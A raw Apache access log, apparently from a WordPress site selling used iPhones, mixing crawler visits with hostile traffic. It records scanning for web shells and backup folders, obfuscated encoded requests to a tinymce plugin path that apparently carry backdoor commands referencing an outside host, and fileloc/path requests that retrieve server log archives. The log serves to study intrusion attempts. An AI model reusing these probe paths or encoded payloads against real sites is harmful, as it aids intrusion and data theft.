172.71.144.17 - - [06/Dec/2025:03:32:06 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.4.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1760846 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
104.23.245.113 - - [06/Dec/2025:03:32:06 +0100] "GET /?f=1822763220 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:03:32:08 +0100] "GET /?f=1268960561 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:09 +0100] "GET /wp-content/uploads/2024/ HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:09 +0100] "GET /wp-content/uploads/2023/ HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:10 +0100] "GET /wp-content/cache/ HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.172.203 - - [06/Dec/2025:03:32:10 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.5.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1691153 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:11 +0100] "GET /wp-content/w3tc/ HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:12 +0100] "GET /wp-content/et-cache/ HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:13 +0100] "GET /wp-content/cache/supercache/ HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
172.68.70.196 - - [06/Dec/2025:03:32:14 +0100] "GET /?f=280554129 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:15 +0100] "GET /wp-content/wflogs/ HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
162.158.110.164 - - [06/Dec/2025:03:32:15 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.6.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1546807 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:16 +0100] "GET /wp-content/upgrade/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.22.1.32 - - [06/Dec/2025:03:32:15 +0100] "GET /?o=24937460021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:16 +0100] "GET /wp-content/updraft/ HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:18 +0100] "GET /wp-content/ai1wm-backups/ HTTP/1.0" 200 63847 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.164.92 - - [06/Dec/2025:03:32:19 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.7.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1613367 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:19 +0100] "GET /wp-content/backups-dup-lite/ HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
108.162.238.43 - - [06/Dec/2025:03:32:19 +0100] "GET /?f=3296933102 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:20 +0100] "GET /wp-content/backup-db/ HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:21 +0100] "GET /wp-content/1.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:23 +0100] "GET /wp-content/admin.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
162.158.95.109 - - [06/Dec/2025:03:32:23 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.8.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1421193 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.30.99 - - [06/Dec/2025:03:32:23 +0100] "GET /?f=702263309 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.110.164 - - [06/Dec/2025:03:30:24 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939313832342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938383232342q6661333263346166336665333930653239616364393239353865666232633732222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.22.117 - - [06/Dec/2025:03:32:24 +0100] "GET /?f=4142302967 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:24 +0100] "GET /wp-content/plugins/pwnd/as.php HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.23.245.113 - - [06/Dec/2025:03:32:25 +0100] "GET /?o=106395089041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:25 +0100] "GET /wp-content/themes/admin.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
104.23.245.113 - - [06/Dec/2025:03:32:25 +0100] "GET /?f=1639149977 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:26 +0100] "GET /wp-content/upgrade/index.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:27 +0100] "GET /wp-content/uploads/ HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
162.158.95.109 - - [06/Dec/2025:03:32:27 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.processed.9.gz&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 1568669 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:28 +0100] "GET /wp-includes/PHPMailer/ HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
162.159.104.142 - - [06/Dec/2025:03:32:28 +0100] "GET /?f=2776009229 HTTP/1.0" 200 211072 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.110.163 - - [06/Dec/2025:03:32:30 +0100] "GET /wp-includes/images/ HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:30 +0100] "GET /wp-includes/js/ HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:31 +0100] "GET /wp-includes/css/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:32 +0100] "GET /wp-includes/fonts/ HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.23.229.54 - - [06/Dec/2025:03:32:31 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_log.webstat&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 16082 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:32 +0100] "GET /wp-includes/certificates/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:34 +0100] "GET /wp-includes/ID3/ HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:35 +0100] "GET /wp-includes/IXR/ HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.22.117 - - [06/Dec/2025:03:32:34 +0100] "GET /?f=3731326024 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:35 +0100] "GET /wp-includes/Requests/ HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:36 +0100] "GET /wp-includes/SimplePie/ HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.23.239.81 - - [06/Dec/2025:03:32:35 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/logs/access_ssl_log&path=/var/www/vhosts/iphonesused.com/logs HTTP/1.0" 200 169268 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:32:36 +0100] "GET /wp-includes/Text/ HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:37 +0100] "GET /wp-includes/SimplePie/autoload_classmap.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:37 +0100] "GET /wp-includes/SimplePie/chosen.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.70.208.57 - - [06/Dec/2025:03:32:37 +0100] "GET /?f=1755668256 HTTP/1.0" 200 63847 "https://iphonesused.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
172.71.110.163 - - [06/Dec/2025:03:32:38 +0100] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
104.22.1.32 - - [06/Dec/2025:03:32:38 +0100] "GET /?f=1139046281 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:39 +0100] "GET /wp-includes/css/autoload_classmap.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:39 +0100] "GET /wp-includes/fonts/autoload_classmap.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
172.69.71.183 - - [06/Dec/2025:03:32:41 +0100] "GET /?f=3476532148 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:42 +0100] "GET /wp-includes/js/crop/ HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.70.251.209 - - [06/Dec/2025:03:30:45 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939313834352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938383234352q3336363537363037373036353463373432626139643237633265653137663035222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.110.163 - - [06/Dec/2025:03:32:45 +0100] "GET /wp-includes/pomo/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:45 +0100] "GET /wp-includes/rest-api/search/index.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
172.71.22.117 - - [06/Dec/2025:03:32:46 +0100] "GET /?f=1662425534 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:47 +0100] "GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:48 +0100] "GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:48 +0100] "GET /wp-includes/style-engine/wp-conflg.php HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:49 +0100] "GET /wp-includes/theme-compat/ HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.22.117 - - [06/Dec/2025:03:32:49 +0100] "GET /?f=2201446868 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:03:32:49 +0100] "GET /?f=2129808383 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:49 +0100] "GET /wp-includes/widgets/autoload_classmap.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:50 +0100] "GET /moon.php HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:51 +0100] "GET /wp-includes/rest-api/ HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:51 +0100] "GET /wp-includes/widgets/ HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:52 +0100] "GET /wp-admin/css/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
104.22.1.32 - - [06/Dec/2025:03:32:52 +0100] "GET /?f=1452410627 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:53 +0100] "GET /wp-admin/images/ HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.69.71.183 - - [06/Dec/2025:03:32:53 +0100] "GET /?f=1015798921 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:03:32:53 +0100] "GET /?o=43849938021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:54 +0100] "GET /wp-admin/maint/ HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:54 +0100] "GET /wp-admin/meta/ HTTP/1.0" 200 63847 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:55 +0100] "GET /wp-admin/network/ HTTP/1.0" 200 68158 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.68.70.196 - - [06/Dec/2025:03:32:56 +0100] "GET /?f=508099645 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:32:56 +0100] "GET /wp-admin/user/ HTTP/1.0" 200 32649 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:57 +0100] "GET /wp-content/ HTTP/1.0" 200 3509 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:58 +0100] "GET /wp-content/plugins/ HTTP/1.0" 200 3509 "https://www.bing.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:32:59 +0100] "GET /wp-content/themes/ HTTP/1.0" 200 3509 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:32:59 +0100] "GET /wp-admin/includes/ HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:33:00 +0100] "GET /wp-includes/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:33:00 +0100] "GET /wp-content/mu-plugins-old/ HTTP/1.0" 200 63847 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:33:01 +0100] "GET /wp-content/themes/classic/inc/ HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.22.117 - - [06/Dec/2025:03:33:01 +0100] "GET /?f=2478533668 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:33:02 +0100] "GET /wp-content/plugins/ninja-forms/ HTTP/1.0" 200 63847 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:33:03 +0100] "GET /wp-content/mu-plugins/ HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.68.70.196 - - [06/Dec/2025:03:33:04 +0100] "GET /?f=3963564899 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:33:04 +0100] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:33:05 +0100] "GET /wp-includes/blocks/ HTTP/1.0" 200 3540 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
104.22.1.32 - - [06/Dec/2025:03:33:05 +0100] "GET /?f=2830091316 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:33:05 +0100] "GET /wp-includes/customize/ HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.246.46 - - [06/Dec/2025:03:31:06 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939313836362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938383236362q3866633538333166343032623264353333376633316234383730326236626165222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.110.163 - - [06/Dec/2025:03:33:06 +0100] "GET /index.php HTTP/1.0" 200 63847 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
162.159.106.43 - - [06/Dec/2025:03:33:06 +0100] "GET /?f=180368877 HTTP/1.0" 200 227203 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
